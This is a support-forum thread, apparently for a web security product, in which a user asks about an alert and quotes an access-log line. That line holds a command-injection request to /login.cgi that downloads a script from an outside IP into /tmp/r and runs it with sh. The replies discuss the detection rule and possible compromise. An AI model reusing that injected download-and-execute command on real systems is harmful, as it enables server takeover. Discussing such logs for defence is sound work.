Announcement

Collapse
No announcement yet.

A web attack returned code 200 (success).

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    A web attack returned code 200 (success).

    Hi there,

    Ive seen a couple of these in IM logs:

    Code:
    A web attack returned code 200 (success).

6

block

79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"
    What does it mean when it says: A web attack returned code 200 (success)?

    thx
    G
    Tags: None
  • #2
    Hello! This rule doesnt work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
    Thank you!

    Comment

    • #3
      IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

      More info: https://www.exploit-db.com/exploits/44760/

      Comment

      • #4
        Hello! This particular request doesnt trigger a blocking rule though it is being spotted by 3 generic rules from i360_1_generic.conf Please take into consideration that in order to be blocked a request pattern should present in strict rule sets (blocking rules) but it doesnt based on the 200 response. You can try to activate Proactive Defense (and turn Kill mode on), which logic is based on an advanced heuristic mechanism but not on patterns match. With this mode enabled the aforementioned request will be 100% blocked (checked!).

        Comment

        Previous template Next
        Working...
        X